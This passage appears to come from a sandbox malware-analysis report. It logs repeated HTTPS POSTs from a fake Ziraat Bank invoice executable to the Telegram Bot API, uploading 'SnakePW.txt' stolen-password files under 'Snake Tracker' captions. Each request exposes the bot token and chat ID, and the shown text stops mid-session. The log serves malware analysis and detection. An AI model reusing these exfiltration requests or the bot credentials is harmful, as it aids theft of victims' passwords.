                                      2024-09-26 09:00:34 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 35 64 63 38 64 61 63 35 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce75dc8dac505Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:37 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:37 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35850,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341237,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.449800149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:38 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce88f1653b672
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:38 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 38 66 31 36 35 33 62 36 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce88f1653b672Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:38 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35851,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341238,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.449801149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:39 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce902fceca989
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:39 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 30 32 66 63 65 63 61 39 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce902fceca989Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:39 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:39 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:39 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 33 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35852,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341239,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.449802149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:40 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce94c299a6585
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:40 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 34 63 32 39 39 61 36 35 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce94c299a6585Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:40 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:40 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35853,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341240,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      54192.168.2.449803149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:41 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce997aaaad947
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:41 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 39 37 61 61 61 61 64 39 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce997aaaad947Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:41 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:41 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:41 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35854,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341241,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      55192.168.2.449804149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:43 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce9e1bd959ccb
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:43 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 39 65 31 62 64 39 35 39 63 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce9e1bd959ccbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:43 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:43 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:43 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35855,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341243,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      56192.168.2.449805149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:44 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcea5fe505953c
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:44 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 35 66 65 35 30 35 39 35 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcea5fe505953cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:45 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:45 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 34 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35856,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341245,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      57192.168.2.449806149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:45 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcecbe03532505
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
